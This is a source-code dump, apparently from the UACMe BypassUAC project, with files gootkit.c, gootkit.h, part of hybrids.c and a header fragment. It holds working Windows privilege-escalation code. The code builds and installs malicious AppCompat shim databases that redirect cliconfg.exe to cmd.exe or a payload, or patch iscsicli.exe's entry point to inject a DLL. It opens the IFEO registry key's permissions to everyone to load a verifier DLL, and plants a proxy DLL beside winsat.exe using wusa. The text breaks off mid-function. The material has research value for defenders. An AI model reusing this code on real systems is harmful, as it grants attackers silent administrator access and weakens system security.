68 | #include <Windows.h>
69 | #include <ntstatus.h>
70 | #include "..\shared\ntos.h"
71 | #include "..\shared\minirtl.h"
72 | #include "consts.h"
73 | #include "compress.h"
74 | #include "sup.h"
75 | #include "inject.h"
76 | #include "cmdline.h"
77 | #include "pitou.h"
78 | #include "gootkit.h"
79 | #include "simda.h"
80 | #include "carberp.h"
81 | #include "hybrids.h"
82 | 
83 | 
84 | 
85 | typedef struct _UACME_CONTEXT {
86 | 	BOOL                IsWow64;
87 | 	UACBYPASSMETHOD     Method;
88 | 	HINSTANCE           hKernel32;
89 | 	HINSTANCE           hOle32;
90 | 	HINSTANCE           hShell32;
91 | 	PVOID               PayloadDll;
92 | 	ULONG               PayloadDllSize;
93 | 	RTL_OSVERSIONINFOW  osver;
94 | 	WCHAR               szSystemDirectory[MAX_PATH + 1];
95 | } UACMECONTEXT, *PUACMECONTEXT;
96 | 
97 | extern UACMECONTEXT g_ctx;
98 | 


--------------------------------------------------------------------------------
/BypassUAC/gootkit.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016,
  4 | *  (C) Original idea (?) mzH,
  5 | *  (C) MS FixIT Shim Patches revealed by Jon Erickson
  6 | **
  7 | *  TITLE:       GOOTKIT.C
  8 | *
  9 | *  VERSION:     2.00
 10 | *
 11 | *  DATE:        16 Nov 2015
 12 | *
 13 | *  Gootkit based AutoElevation using AppCompat.
 14 | *
 15 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 16 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 17 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 18 | * PARTICULAR PURPOSE.
 19 | *
 20 | *******************************************************************************/
 21 | 
 22 | #include "global.h"
 23 | #include "apphelp.h"
 24 | #include "inazuma32.h"
 25 | 
 26 | HMODULE hAppHelp;
 27 | 
 28 | pfnSdbCreateDatabase       SdbCreateDatabase;
 29 | pfnSdbWriteDWORDTag        SdbWriteDWORDTag;
 30 | pfnSdbWriteStringTag       SdbWriteStringTag;
 31 | pfnSdbWriteBinaryTag       SdbWriteBinaryTag;
 32 | pfnSdbEndWriteListTag      SdbEndWriteListTag;
 33 | pfnSdbBeginWriteListTag    SdbBeginWriteListTag;
 34 | pfnSdbCloseDatabaseWrite   SdbCloseDatabaseWrite;
 35 | pfnSdbStartIndexing        SdbStartIndexing;
 36 | pfnSdbStopIndexing         SdbStopIndexing;
 37 | pfnSdbCommitIndexes        SdbCommitIndexes;
 38 | pfnSdbDeclareIndex         SdbDeclareIndex;
 39 | 
 40 | static const WCHAR	SHIMPATCH_BINARYNAME[] = L"binarypatch01";
 41 | static const WCHAR	SHIMPATCH_EXENAME[] = L"iscsicli.exe";
 42 | static const WCHAR  SHIMPATCH_MSFTFULL[] = L"Microsoft Corporation";
 43 | static const WCHAR  SHIM_SDBINSTALLER[] = L"%ws\\sdbinst.exe";
 44 | 
 45 | /*
 46 | * ucmInitAppHelp
 47 | *
 48 | * Purpose:
 49 | *
 50 | * Initialize AppHelp routines.
 51 | *
 52 | */
 53 | BOOL ucmInitAppHelp(
 54 | 	VOID
 55 | 	)
 56 | {
 57 | 	BOOL bResult = FALSE;
 58 | 	BOOL cond = FALSE;
 59 | 
 60 | 	do {
 61 | 		SdbCreateDatabase = (pfnSdbCreateDatabase)GetProcAddress(hAppHelp, "SdbCreateDatabase");
 62 | 		if (SdbCreateDatabase == NULL) {
 63 | 			break;
 64 | 		}
 65 | 
 66 | 		SdbBeginWriteListTag = (pfnSdbBeginWriteListTag)GetProcAddress(hAppHelp, "SdbBeginWriteListTag");
 67 | 		if (SdbBeginWriteListTag == NULL) {
 68 | 			break;
 69 | 		}
 70 | 
 71 | 		SdbEndWriteListTag = (pfnSdbEndWriteListTag)GetProcAddress(hAppHelp, "SdbEndWriteListTag");
 72 | 		if (SdbEndWriteListTag == NULL) {
 73 | 			break;
 74 | 		}
 75 | 
 76 | 		SdbWriteStringTag = (pfnSdbWriteStringTag)GetProcAddress(hAppHelp, "SdbWriteStringTag");
 77 | 		if (SdbWriteStringTag == NULL) {
 78 | 			break;
 79 | 		}
 80 | 
 81 | 		SdbCloseDatabaseWrite = (pfnSdbCloseDatabaseWrite)GetProcAddress(hAppHelp, "SdbCloseDatabaseWrite");
 82 | 		if (SdbCloseDatabaseWrite == NULL) {
 83 | 			break;
 84 | 		}
 85 | 
 86 | 		SdbWriteBinaryTag = (pfnSdbWriteBinaryTag)GetProcAddress(hAppHelp, "SdbWriteBinaryTag");
 87 | 		if (SdbWriteBinaryTag == NULL) {
 88 | 			break;
 89 | 		}
 90 | 
 91 | 		SdbWriteDWORDTag = (pfnSdbWriteDWORDTag)GetProcAddress(hAppHelp, "SdbWriteDWORDTag");
 92 | 		if (SdbWriteDWORDTag == NULL) {
 93 | 			break;
 94 | 		}
 95 | 
 96 | 		SdbDeclareIndex = (pfnSdbDeclareIndex)GetProcAddress(hAppHelp, "SdbDeclareIndex");
 97 | 		if (SdbDeclareIndex == NULL) {
 98 | 			break;
 99 | 		}
100 | 
101 | 		SdbStartIndexing = (pfnSdbStartIndexing)GetProcAddress(hAppHelp, "SdbStartIndexing");
102 | 		if (SdbStartIndexing == NULL) {
103 | 			break;
104 | 		}
105 | 
106 | 		SdbStopIndexing = (pfnSdbStopIndexing)GetProcAddress(hAppHelp, "SdbStopIndexing");
107 | 		if (SdbStopIndexing == NULL) {
108 | 			break;
109 | 		}
110 | 
111 | 		SdbCommitIndexes = (pfnSdbCommitIndexes)GetProcAddress(hAppHelp, "SdbCommitIndexes");
112 | 		if (SdbCommitIndexes == NULL) {
113 | 			break;
114 | 		}
115 | 
116 | 		bResult = TRUE;
117 | 
118 | 	} while (cond);
119 | 
120 | 	return bResult;
121 | }
122 | 
123 | /*
124 | * ucmRegisterAndRunTarget
125 | *
126 | * Purpose:
127 | *
128 | * Register shim database and execute target app.
129 | *
130 | */
131 | BOOL ucmRegisterAndRunTarget(
132 | 	_In_ LPWSTR lpSystemDirectory,
133 | 	_In_ LPWSTR lpSdbinstPath,
134 | 	_In_ LPWSTR lpShimDbPath,
135 | 	_In_ LPWSTR lpTarget,
136 | 	_In_ BOOL IsPatch
137 | 	)
138 | {
139 | 	BOOL bResult = FALSE;
140 | 	WCHAR szTempDirectory[MAX_PATH * 2];
141 | 	WCHAR szCmd[MAX_PATH * 4];
142 | 
143 | 	if ((lpTarget == NULL) ||
144 | 		(lpSystemDirectory == NULL)  ||
145 | 		(lpSdbinstPath == NULL) ||
146 | 		(lpShimDbPath == NULL)
147 | 		)
148 | 	{
149 | 		return bResult;
150 | 	}
151 | 
152 | 	RtlSecureZeroMemory(szCmd, sizeof(szCmd));
153 | 	if (IsPatch) {
154 | 		wsprintf(szCmd, L"-p %ws", lpShimDbPath);
155 | 	}
156 | 	else {
157 | 		_strcpy_w(szCmd, lpShimDbPath);
158 | 	}
159 | 
160 | 	//register shim, sdbinst.exe
161 | 	if (supRunProcess(lpSdbinstPath, szCmd)) {
162 | 		RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
163 | 		wsprintfW(szTempDirectory, lpTarget, lpSystemDirectory);
164 | 		bResult = supRunProcess(szTempDirectory, NULL);
165 | 
166 | 		//remove database
167 | 		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
168 | 		wsprintf(szCmd, L"/q /u %ws", lpShimDbPath);
169 | 		supRunProcess(lpSdbinstPath, szCmd);
170 | 		DeleteFileW(lpShimDbPath);
171 | 	}
172 | 	return bResult;
173 | }
174 | 
175 | /*
176 | * ucmShimRedirectEXE
177 | *
178 | * Purpose:
179 | *
180 | * Build, register shim database and execute target app.
181 | * Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
182 | * Currently used in number of trojans (Win32/Dyre, WinNT/Cridex).
183 | *
184 | */
185 | BOOL ucmShimRedirectEXE(
186 | 	LPWSTR lpszPayloadEXE
187 | 	)
188 | {
189 | 	BOOL bResult = FALSE;
190 | 	PDB hShimDb;
191 | 	GUID dbGUID, exeGUID;
192 | 	WCHAR szTempDirectory[MAX_PATH * 2];
193 | 	WCHAR szShimDbPath[MAX_PATH * 2];
194 | 	WCHAR szSdbinstPath[MAX_PATH * 2];
195 | 	WCHAR szSystemDirectory[MAX_PATH];
196 | 
197 | 	TAGID tidDB = 0;
198 | 	TAGID tidEXE = 0;
199 | 	TAGID tidMatchFile = 0;
200 | 	TAGID tidShim = 0;
201 | 	TAGID tidLib = 0;
202 | 
203 | 	if (lpszPayloadEXE == NULL) {
204 | 		return bResult;
205 | 	}
206 | 
207 | 	RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
208 | 	RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
209 | 
210 | 	if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
211 | 		return bResult;
212 | 	}
213 | 	wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);
214 | 
215 | 	//
216 | 	// GUIDs are important, for both DATABASE and EXE file.
217 | 	// They used as shim identifiers and must to be set.
218 | 	//
219 | 	if (CoCreateGuid(&dbGUID) != S_OK) {
220 | 		return bResult;
221 | 	}
222 | 	if (CoCreateGuid(&exeGUID) != S_OK) {
223 | 		return bResult;
224 | 	}
225 | 
226 | 	RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
227 | 	RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
228 | 
229 | 	if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
230 | 		return bResult;
231 | 	}
232 | 
233 | 	wsprintfW(szShimDbPath, L"%wspe386.sdb", szTempDirectory);
234 | 
235 | 	hShimDb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
236 | 	if (hShimDb == NULL) {
237 | 		return bResult;
238 | 	}
239 | 
240 | 	//write shim DB header
241 | 	tidDB = SdbBeginWriteListTag(hShimDb, TAG_DATABASE);
242 | 	if (tidDB != TAGID_NULL) {
243 | 
244 | 		SdbWriteStringTag(hShimDb, TAG_NAME, L"pe386");
245 | 		SdbWriteDWORDTag(hShimDb, TAG_OS_PLATFORM, 0x1); //win32 only RedirectEXE
246 | 		SdbWriteBinaryTag(hShimDb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));
247 | 
248 | 		//just as ACT 5.6 does
249 | 		tidLib = SdbBeginWriteListTag(hShimDb, TAG_LIBRARY);
250 | 		if (tidLib != TAGID_NULL) SdbEndWriteListTag(hShimDb, tidLib);
251 | 
252 | 		//write shim task information
253 | 		tidEXE = SdbBeginWriteListTag(hShimDb, TAG_EXE);
254 | 		if (tidEXE != TAGID_NULL) {
255 | 			SdbWriteStringTag(hShimDb, TAG_NAME, L"cliconfg.exe");
256 | 			SdbWriteStringTag(hShimDb, TAG_APP_NAME, L"cliconfg.exe");
257 | 			SdbWriteStringTag(hShimDb, TAG_VENDOR, L"Microsoft");
258 | 			SdbWriteBinaryTag(hShimDb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));
259 | 
260 | 			//write shim target info
261 | 			tidMatchFile = SdbBeginWriteListTag(hShimDb, TAG_MATCHING_FILE);
262 | 			if (tidMatchFile != TAGID_NULL) {
263 | 				SdbWriteStringTag(hShimDb, TAG_NAME, L"*"); //<-from any
264 | 				SdbWriteStringTag(hShimDb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
265 | 				SdbWriteStringTag(hShimDb, TAG_INTERNAL_NAME, L"cliconfg.exe");
266 | 				SdbEndWriteListTag(hShimDb, tidMatchFile);
267 | 			}
268 | 
269 | 			//write shim action info
270 | 			tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
271 | 			if (tidShim != TAGID_NULL) {
272 | 				SdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
273 | 				SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
274 | 				SdbEndWriteListTag(hShimDb, tidShim);
275 | 			}
276 | 			SdbEndWriteListTag(hShimDb, tidEXE);
277 | 		}
278 | 		SdbEndWriteListTag(hShimDb, tidDB);
279 | 	}
280 | 	SdbCloseDatabaseWrite(hShimDb);
281 | 
282 | 	bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\cliconfg.exe", FALSE);
283 | 	return bResult;
284 | }
285 | 
286 | /*
287 | * ucmShimPatch
288 | *
289 | * Purpose:
290 | *
291 | * Build, register shim patch database and execute target app with forced Entry Point Override.
292 | * Aside from UAC bypass this is also dll injection technique.
293 | *
294 | */
295 | BOOL ucmShimPatch(
296 | 	CONST PVOID ProxyDll,
297 | 	DWORD ProxyDllSize
298 | 	)
299 | {
300 | 	BOOL bResult = FALSE, cond = FALSE;
301 | 	PDB	 hpdb;
302 | 	GUID dbGUID, exeGUID;
303 | 	
304 | 	WCHAR szTempDirectory[MAX_PATH * 2];
305 | 	WCHAR szShimDbPath[MAX_PATH * 2];
306 | 	WCHAR szSdbinstPath[MAX_PATH * 2];
307 | 	WCHAR szSystemDirectory[MAX_PATH];
308 | 
309 | 	DWORD		indexid = MAXDWORD, sz, epRVA = 0;
310 | 	TAGID		dbrf, libref, patchref, exeref, matchfileref, patchfileref;
311 | 	PBYTE		tmp;
312 | 	PPATCHBITS	patchbits;
313 | 
314 | 	RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
315 | 	RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
316 | 
317 | 	do {
318 | 
319 | 		if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
320 | 			break;
321 | 		}
322 | 		wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);
323 | 
324 | 		if (CoCreateGuid(&dbGUID) != S_OK) {
325 | 			break;
326 | 		}
327 | 		if (CoCreateGuid(&exeGUID) != S_OK) {
328 | 			break;
329 | 		}
330 | 
331 | 		RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
332 | 
333 | 		if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
334 | 			break;
335 | 		}
336 | 
337 | 		// drop Fubuki
338 | 		RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
339 | 		wsprintfW(szShimDbPath, L"%wsr3.dll", szTempDirectory);
340 | 		if (!supWriteBufferToFile(szShimDbPath, ProxyDll, ProxyDllSize))
341 | 		{
342 | 			break;
343 | 		}
344 | 
345 | 		RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
346 | 
347 | 		wsprintfW(szShimDbPath, L"%wsamuzani.sdb", szTempDirectory);
348 | 
349 | 		hpdb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
350 | 		if (hpdb == NULL) {
351 | 			break;
352 | 		}
353 | 
354 | 		if (!SdbDeclareIndex(hpdb, TAG_EXE, TAG_NAME, 1, TRUE, &indexid)) {
355 | 			break;
356 | 		}
357 | 		if (!SdbStartIndexing(hpdb, indexid)) {
358 | 			break;
359 | 		}
360 | 		SdbStopIndexing(hpdb, indexid);
361 | 		SdbCommitIndexes(hpdb);
362 | 
363 | 		// begin DATABASE {
364 | 		dbrf = SdbBeginWriteListTag(hpdb, TAG_DATABASE);		
365 | 		if (!SdbWriteStringTag(hpdb, TAG_NAME, L"amuzani")) {
366 | 			break;
367 | 		}
368 | 		SdbWriteBinaryTag(hpdb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));
369 | 		SdbWriteDWORDTag(hpdb, TAG_OS_PLATFORM, 0x1); //<- win32
370 | 
371 | 		// begin LIBRARY {
372 | 		libref = SdbBeginWriteListTag(hpdb, TAG_LIBRARY);
373 | 
374 | 		patchref = SdbBeginWriteListTag(hpdb, TAG_PATCH); // begin LIBRARY-PATCH
375 | 		SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
376 | 
377 | 		// query EP RVA for target
378 | 		RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
379 | 		wsprintfW(szTempDirectory, L"%ws\\%ws", szSystemDirectory, SHIMPATCH_EXENAME);
380 | 		epRVA = supQueryEntryPointRVA(szTempDirectory);
381 | 		if (epRVA == 0) {
382 | 			break;
383 | 		}
384 | 
385 | 		tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
386 | 		if (tmp != NULL) {
387 | 			patchbits = (PPATCHBITS)tmp;
388 | 			sz = 0;
389 | 			patchbits->Opcode = PATCH_REPLACE;
390 | 			patchbits->RVA = epRVA;
391 | 			_strcpy_w(patchbits->ModuleName, SHIMPATCH_EXENAME);
392 | 			supCopyMemory((char *)&patchbits->Pattern, sizeof(patchcode32), patchcode32, sizeof(patchcode32));
393 | 			patchbits->PatternSize = sizeof(patchcode32);
394 | 			patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;
395 | 			sz += patchbits->ActionSize;
396 | 			SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
397 | 			HeapFree(GetProcessHeap(), 0, tmp);
398 | 		}
399 | 		SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH
400 | 
401 | 		// end LIBRARY
402 | 		SdbEndWriteListTag(hpdb, libref);
403 | 
404 | 		SdbStartIndexing(hpdb, indexid);
405 | 
406 | 		// begin EXE {
407 | 		exeref = SdbBeginWriteListTag(hpdb, TAG_EXE);
408 | 		SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
409 | 		SdbWriteStringTag(hpdb, TAG_APP_NAME, SHIMPATCH_EXENAME);
410 | 		SdbWriteBinaryTag(hpdb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));
411 | 
412 | 		// begin MATCH {
413 | 		matchfileref = SdbBeginWriteListTag(hpdb, TAG_MATCHING_FILE);
414 | 		SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
415 | 		SdbWriteStringTag(hpdb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
416 | 		SdbEndWriteListTag(hpdb, matchfileref); // } end MATCH
417 | 
418 | 		patchfileref = SdbBeginWriteListTag(hpdb, TAG_PATCH_REF);
419 | 		SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
420 | 		SdbWriteDWORDTag(hpdb, TAG_PATCH_TAGID, patchref);
421 | 		SdbEndWriteListTag(hpdb, patchfileref);
422 | 
423 | 		SdbEndWriteListTag(hpdb, exeref); // } end EXE
424 | 
425 | 		// } end DATABASE
426 | 		SdbEndWriteListTag(hpdb, dbrf);
427 | 
428 | 		SdbCloseDatabaseWrite(hpdb);
429 | 
430 | 		// Register db and run target.
431 | 		bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\iscsicli.exe", TRUE);
432 | 
433 | 	} while (cond);
434 | 
435 | 	return bResult;
436 | }
437 | 
438 | /*
439 | * ucmAppcompatElevation
440 | *
441 | * Purpose:
442 | *
443 | * AutoElevation using Application Compatibility engine.
444 | *
445 | */
446 | BOOL ucmAppcompatElevation(
447 | 	UACBYPASSMETHOD Method,
448 | 	CONST PVOID ProxyDll,
449 | 	DWORD ProxyDllSize,
450 | 	LPWSTR lpszPayloadEXE
451 | 	)
452 | {
453 | 	BOOL cond = FALSE, bResult = FALSE;
454 | 	WCHAR szBuffer[MAX_PATH * 2];
455 | 
456 | 	do {
457 | 
458 | 		RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
459 | 		if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"),
460 | 			szBuffer, MAX_PATH) == 0)
461 | 		{
462 | 			break;
463 | 		}
464 | 
465 | 		hAppHelp = LoadLibrary(szBuffer);
466 | 		if (hAppHelp == NULL) {
467 | 			break;
468 | 		}
469 | 
470 | 		if (ucmInitAppHelp() == FALSE) {
471 | 			break;
472 | 		}
473 | 
474 | 		//create and register shim with RedirectEXE, cmd.exe as payload
475 | 		if (Method == UacMethodRedirectExe) {
476 | 
477 | 			if (lpszPayloadEXE == NULL) {
478 | 				_strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe");
479 | 				bResult = ucmShimRedirectEXE(szBuffer);
480 | 			}
481 | 			else {
482 | 				bResult = ucmShimRedirectEXE(lpszPayloadEXE);
483 | 			}
484 | 			return bResult;
485 | 		}  	
486 | 		//create and register shim patch with fubuki as payload
487 | 		if (Method == UacMethodShimPatch) {
488 | 			bResult = ucmShimPatch(ProxyDll, ProxyDllSize);
489 | 		}
490 | 
491 | 	} while (cond);
492 | 
493 | 	return bResult;
494 | }
495 | 


--------------------------------------------------------------------------------
/BypassUAC/gootkit.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016, 
 4 | *  (C) Original idea (?) mzH,
 5 | *  (C) FixIT Shim Patches by Jon Erickson
 6 | *
 7 | *  TITLE:       GOOTKIT.H
 8 | *
 9 | *  VERSION:     2.00
10 | *
11 | *  DATE:        16 Nov 2015
12 | *
13 | *  Prototypes and definitions for Gootkit method.
14 | *
15 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
16 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
17 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
18 | * PARTICULAR PURPOSE.
19 | *
20 | *******************************************************************************/
21 | #pragma once
22 | 
23 | BOOL ucmAppcompatElevation(
24 | 	UACBYPASSMETHOD Method,
25 | 	CONST PVOID ProxyDll,
26 | 	DWORD ProxyDllSize,
27 | 	LPWSTR lpszPayloadEXE
28 | 	);
29 | 


--------------------------------------------------------------------------------
/BypassUAC/hybrids.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
  4 | *
  5 | *  TITLE:       HYBRIDS.C
  6 | *
  7 | *  VERSION:     2.01
  8 | *
  9 | *  DATE:        04 Jan 2016
 10 | *
 11 | *  Hybrid UAC bypass methods.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #include "global.h"
 20 | #include "makecab.h"
 21 | 
 22 | #include <Shlwapi.h>
 23 | #pragma comment(lib, "shlwapi.lib")
 24 | 
 25 | ELOAD_PARAMETERS_4 g_ElevParamsSirefef;
 26 | 
 27 | /*
 28 | * ucmAvrfMethod
 29 | *
 30 | * Purpose:
 31 | *
 32 | * Acquire elevation through Application Verifier dll injection.
 33 | *
 34 | */
 35 | BOOL ucmAvrfMethod(
 36 | 	CONST PVOID AvrfDll,
 37 | 	DWORD AvrfDllSize
 38 | 	)
 39 | {
 40 | 	BOOL bResult = FALSE, cond = FALSE;
 41 | 	HKEY hKey = NULL, hSubKey = NULL;
 42 | 	LRESULT lRet;
 43 | 	DWORD dwValue = 0x100; // FLG_APPLICATION_VERIFIER;
 44 | 	WCHAR szCmd[MAX_PATH * 4];
 45 | 
 46 | 	if (
 47 | 		(AvrfDll == NULL) ||
 48 | 		(AvrfDllSize == 0)
 49 | 		)
 50 | 	{
 51 | 		return bResult;
 52 | 	}
 53 | 
 54 | 	do {
 55 | 
 56 | 		//
 57 | 		// Set new key security dacl
 58 | 		// Red Alert: manually restore IFEO key permissions after using this tool, as they are not inherited.
 59 | 		//
 60 | 		if (!ucmSimdaAlterObjectSecurity(SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, T_IFEO, T_SDDL_ALL_FOR_EVERYONE))
 61 | 			break;
 62 | 
 63 | 		//open IFEO key
 64 | 		lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"),
 65 | 			0, KEY_ALL_ACCESS, &hKey);
 66 | 		if ((lRet != ERROR_SUCCESS) || (hKey == NULL))
 67 | 			break;
 68 | 
 69 | 		//Set new key and values
 70 | 		hSubKey = NULL;
 71 | 		lRet = RegCreateKey(hKey, TEXT("cliconfg.exe"), &hSubKey);
 72 | 		if ((hSubKey == NULL) || (lRet != ERROR_SUCCESS))
 73 | 			break;
 74 | 
 75 | 		lRet = RegSetValueEx(hSubKey, TEXT("GlobalFlag"), 0, REG_DWORD, (BYTE*)&dwValue, sizeof(DWORD));
 76 | 		if (lRet != ERROR_SUCCESS)
 77 | 			break;
 78 | 
 79 | 		dwValue = (DWORD)_strlen(T_AVRFDLL) * sizeof(TCHAR);
 80 | 		lRet = RegSetValueEx(hSubKey, TEXT("VerifierDlls"), 0, REG_SZ, (BYTE*)&T_AVRFDLL, dwValue);
 81 | 		if (lRet != ERROR_SUCCESS)
 82 | 			break;
 83 | 
 84 | 		// Cleanup registry, we don't need anymore.
 85 | 		RegCloseKey(hSubKey);
 86 | 		hSubKey = NULL;
 87 | 		RegCloseKey(hKey);
 88 | 		hKey = NULL;
 89 | 
 90 | 		//
 91 | 		// Extract file to the protected directory
 92 | 		// First, create cab with fake msu ext, second run fusion process.
 93 | 		//
 94 | 		if (!ucmCreateCabinetForSingleFile(T_AVRF_SOURCEDLL, AvrfDll, AvrfDllSize))
 95 | 			break;
 96 | 
 97 | 		// Drop Hibiki to system32
 98 | 		if (!ucmWusaExtractPackage(T_AVRF_CMDLINE))
 99 | 			break;
100 | 
101 | 		// Finally run target fusion process.
102 | 		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
103 | 		if (ExpandEnvironmentStringsW(METHOD_SQLSRV_TARGETAPP,
104 | 			szCmd, MAX_PATH) == 0)
105 | 		{
106 | 			break;
107 | 		}
108 | 		bResult = supRunProcess(szCmd, NULL);
109 | 
110 | 	} while (cond);
111 | 
112 | 	if (hKey != NULL) {
113 | 		RegCloseKey(hKey);
114 | 	}
115 | 	if (hSubKey != NULL) {
116 | 		RegCloseKey(hSubKey);
117 | 	}
118 | 	return bResult;
119 | }
120 | 
121 | /*
122 | * ucmWinSATMethod
123 | *
124 | * Purpose:
125 | *
126 | * Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation.
127 | * Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application.
128 | * This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too.
129 | * WinSAT used for demonstration purposes only.
130 | *
131 | */
132 | BOOL ucmWinSATMethod(
133 | 	LPWSTR lpTargetDll,
134 | 	PVOID ProxyDll,
135 | 	DWORD ProxyDllSize,
136 | 	BOOL UseWusa
137 | 	)
138 | {
139 | 	BOOL bResult = FALSE, cond = FALSE;
140 | 	CABDATA *Cabinet = NULL;
141 | 	WCHAR szSource[MAX_PATH + 1];
142 | 	WCHAR szDest[MAX_PATH + 1];
143 | 	WCHAR szBuffer[MAX_PATH + 1];
144 | 
145 | 	if (
146 | 		(ProxyDll == NULL) ||
147 | 		(ProxyDllSize == 0) ||
148 | 		(lpTargetDll == NULL) 
149 | 		)
150 | 	{
151 | 		return bResult;
152 | 	}
153 | 
154 | 	if (_strlen_w(lpTargetDll) > 100) {
155 | 		return bResult;
156 | 	}
157 | 
158 | 	RtlSecureZeroMemory(szSource, sizeof(szSource));
159 | 	RtlSecureZeroMemory(szDest, sizeof(szDest));
160 | 
161 | 	do {
162 | 
163 | 		if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe",
164 | 			szSource, MAX_PATH) == 0)
165 | 		{
166 | 			break;
167 | 		}
168 | 
169 | 		if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
170 | 			szDest, MAX_PATH) == 0)
171 | 		{
172 | 			break;
173 | 		}
174 | 
175 | 		// Copy winsat to temp directory
176 | 		if (!CopyFile(szSource, szDest, FALSE)) {
177 | 			break;
178 | 		}
179 | 
180 | 		//put target dll
181 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
182 | 		_strcpy_w(szBuffer, TEMPDIR);
183 | 		_strcat_w(szBuffer, lpTargetDll);
184 | 
185 | 
186 | 		//expand string for proxy dll
187 | 		RtlSecureZeroMemory(szSource, sizeof(szSource));
188 | 		if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
189 | 			break;
190 | 		}
191 | 
192 | 		//write proxy dll to disk
193 | 		if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
194 | 			break;
195 | 		}
196 | 
197 | 		//
198 | 		// Two options: use wusa installer or IFileOperation
199 | 		//
200 | 		if ( UseWusa ) {
201 | 
202 | 			//build cabinet
203 | 			RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
204 | 			if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
205 | 				szBuffer, MAX_PATH) == 0)
206 | 			{
207 | 				break;
208 | 			}
209 | 
210 | 			Cabinet = cabCreate(szBuffer);
211 | 			if (Cabinet) {
212 | 
213 | 				//expand string for winsat.exe
214 | 				if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
215 | 					szDest, MAX_PATH) == 0)
216 | 				{
217 | 					break;
218 | 				}
219 | 
220 | 				//put proxy dll inside cabinet
221 | 				cabAddFile(Cabinet, szSource, lpTargetDll);
222 | 
223 | 				//put winsat.exe
